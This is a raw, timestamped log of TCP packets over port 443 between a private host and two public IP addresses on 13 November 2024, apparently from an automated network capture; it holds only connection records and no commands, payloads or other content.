Nov 13, 2024 20:39:28.413316011 CET	443	49747	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.413328886 CET	49747	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.413336039 CET	443	49747	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.418899059 CET	49759	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.418931961 CET	443	49759	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.419002056 CET	49759	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.419265032 CET	49759	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.419279099 CET	443	49759	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.424696922 CET	443	49749	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.424801111 CET	443	49749	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.424875975 CET	49749	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.425055981 CET	49749	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.425084114 CET	443	49749	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.425132036 CET	49749	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.425149918 CET	443	49749	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.428828001 CET	443	49748	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.429088116 CET	443	49748	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.429189920 CET	49748	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.429723978 CET	49760	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.429769993 CET	443	49760	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.429927111 CET	49760	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.430079937 CET	49760	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.430097103 CET	443	49760	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.432064056 CET	49748	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.432085991 CET	443	49748	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.432121992 CET	49748	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.432130098 CET	443	49748	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.437207937 CET	49761	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.437258005 CET	443	49761	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.437365055 CET	49761	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.437735081 CET	49761	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.437755108 CET	443	49761	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.506076097 CET	443	49750	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.506548882 CET	49750	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.506575108 CET	443	49750	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.507177114 CET	49750	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.507184982 CET	443	49750	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.642745972 CET	443	49750	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.642819881 CET	443	49750	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.642898083 CET	49750	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.643074989 CET	49750	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.643100023 CET	443	49750	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.643116951 CET	49750	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.643124104 CET	443	49750	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.645452976 CET	49764	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.645481110 CET	443	49764	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.645544052 CET	49764	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.645704031 CET	49764	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.645715952 CET	443	49764	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.151715040 CET	443	49754	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.152235985 CET	49754	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.152265072 CET	443	49754	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.152851105 CET	443	49755	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.153013945 CET	49755	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.153036118 CET	443	49755	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.153243065 CET	443	49754	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.153311968 CET	49754	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.154628038 CET	443	49755	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.154701948 CET	49755	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.155412912 CET	49754	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.155498028 CET	443	49754	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.155900955 CET	49755	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.155997992 CET	443	49755	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.156502962 CET	49754	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.156521082 CET	443	49754	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.156560898 CET	49755	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.156584978 CET	443	49755	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.156701088 CET	443	49756	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.156738997 CET	443	49759	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.157023907 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.157043934 CET	443	49756	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.157052040 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.157183886 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.157216072 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.157586098 CET	49759	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.157619953 CET	443	49759	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.158184052 CET	49759	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.158193111 CET	443	49759	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.158471107 CET	443	49756	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.158531904 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.158858061 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.158924103 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.159194946 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.159280062 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.159290075 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.159383059 CET	443	49756	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.159506083 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.159513950 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.159538984 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.159545898 CET	443	49756	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.164640903 CET	443	49758	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.165033102 CET	49758	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.165049076 CET	443	49758	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.165566921 CET	49758	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.165572882 CET	443	49758	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.169234037 CET	443	49760	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.169565916 CET	49760	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.169652939 CET	443	49760	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.169888020 CET	49760	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.169908047 CET	443	49760	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.191549063 CET	443	49761	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.191898108 CET	49761	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.191926956 CET	443	49761	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.192315102 CET	49761	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.192323923 CET	443	49761	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.198601961 CET	49755	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.198627949 CET	49754	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.214242935 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.214240074 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.288985014 CET	443	49759	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.289160013 CET	443	49759	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.289232016 CET	49759	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.289292097 CET	49759	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.289310932 CET	443	49759	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.289321899 CET	49759	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.289326906 CET	443	49759	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.292187929 CET	49765	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.292248011 CET	443	49765	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.292346954 CET	49765	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.293117046 CET	49765	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.293148994 CET	443	49765	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.301481962 CET	443	49760	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.301553965 CET	443	49760	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.301665068 CET	49760	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.301750898 CET	49760	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.301750898 CET	49760	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.301798105 CET	443	49760	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.301830053 CET	443	49760	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.302911043 CET	443	49758	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.303210020 CET	443	49758	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.303296089 CET	49758	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.303366899 CET	49758	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.303366899 CET	49758	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.303400993 CET	443	49758	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.303425074 CET	443	49758	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.303631067 CET	49766	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.303697109 CET	443	49766	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.303778887 CET	49766	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.304004908 CET	49766	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.304039001 CET	443	49766	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.305094004 CET	49767	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.305141926 CET	443	49767	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.305234909 CET	49767	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.305341005 CET	49767	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.305371046 CET	443	49767	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.321351051 CET	443	49761	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.321777105 CET	443	49761	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.321830988 CET	49761	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.321861029 CET	49761	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.321861029 CET	49761	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.321882963 CET	443	49761	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.321897030 CET	443	49761	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.323863029 CET	49768	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.323954105 CET	443	49768	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.324052095 CET	49768	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.324215889 CET	49768	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.324250937 CET	443	49768	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.396420002 CET	443	49764	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.396929026 CET	49764	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.396951914 CET	443	49764	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.397506952 CET	49764	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.397519112 CET	443	49764	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.426497936 CET	443	49756	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.429405928 CET	443	49755	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.430460930 CET	443	49754	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.451682091 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.451755047 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.451802015 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.451848030 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.451895952 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.451931953 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.451927900 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.451927900 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.451997042 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.452053070 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.459847927 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.459901094 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.459918022 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.480446100 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.480468035 CET	443	49756	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.480499983 CET	49755	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.480525017 CET	443	49755	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.480539083 CET	49754	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.480564117 CET	443	49754	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.512016058 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.512083054 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.527415991 CET	443	49764	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.527420998 CET	49754	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.527621031 CET	443	49764	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.527779102 CET	49764	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.531163931 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.531240940 CET	49755	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.547439098 CET	443	49756	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.547507048 CET	443	49756	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.547559023 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.551625967 CET	49755	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.551739931 CET	443	49755	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.551791906 CET	49755	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.555993080 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.557521105 CET	443	49754	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.557564974 CET	443	49754	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.557774067 CET	49754	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.568169117 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.568259001 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.568315983 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.568342924 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.570837021 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.570894957 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.570909977 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.575229883 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.575490952 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.575504065 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.584142923 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.585186005 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.585197926 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.593023062 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.595144033 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.595155954 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.602106094 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.603777885 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.603790998 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.610080957 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.611777067 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.611788988 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.618637085 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.618709087 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.618721008 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.627677917 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.627733946 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.627747059 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.629278898 CET	49764	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.629278898 CET	49764	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:29.629304886 CET	443	49764	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.629317999 CET	443	49764	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:29.632162094 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.632169962 CET	443	49756	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.632237911 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.632246017 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.634820938 CET	49754	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.634893894 CET	443	49754	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.673808098 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.673881054 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.685461044 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.685551882 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.685604095 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.685655117 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.685734987 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.685734987 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.685803890 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.687788010 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.687808037 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.687947989 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.687989950 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.688000917 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.688014030 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.688069105 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.691034079 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.694735050 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.694773912 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.694832087 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.694847107 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.695771933 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.702066898 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.707164049 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.707200050 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.707233906 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.707247972 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.707766056 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.712989092 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.719209909 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.719295979 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.719364882 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.719377995 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.719433069 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.725126028 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.731815100 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.731904030 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.732109070 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.732130051 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.732187986 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.737461090 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.743360043 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.743417978 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.743499041 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.743566036 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.743725061 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.749185085 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.755177021 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.755220890 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.755289078 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.755305052 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.755558968 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.761207104 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.767617941 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.767738104 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.767797947 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.767864943 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.767945051 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.773283005 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.779537916 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.779659986 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.779676914 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.802895069 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.803000927 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.803092003 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.803111076 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.803186893 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.803229094 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.803287029 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.803342104 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.803356886 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.803462029 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.803545952 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.803603888 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.803618908 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.803766966 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.803927898 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.808549881 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.811780930 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.811794043 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.813441038 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.813621044 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.813687086 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.818721056 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.818799019 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.818815947 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.824296951 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.827553988 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.827625990 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.827641010 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.827761889 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.827774048 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.830703020 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.831101894 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.831115007 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.834398985 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.835779905 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:29.835793018 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.837039948 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:29.839771986 CET	49757	443	192.168.2.5	142.250.186.164
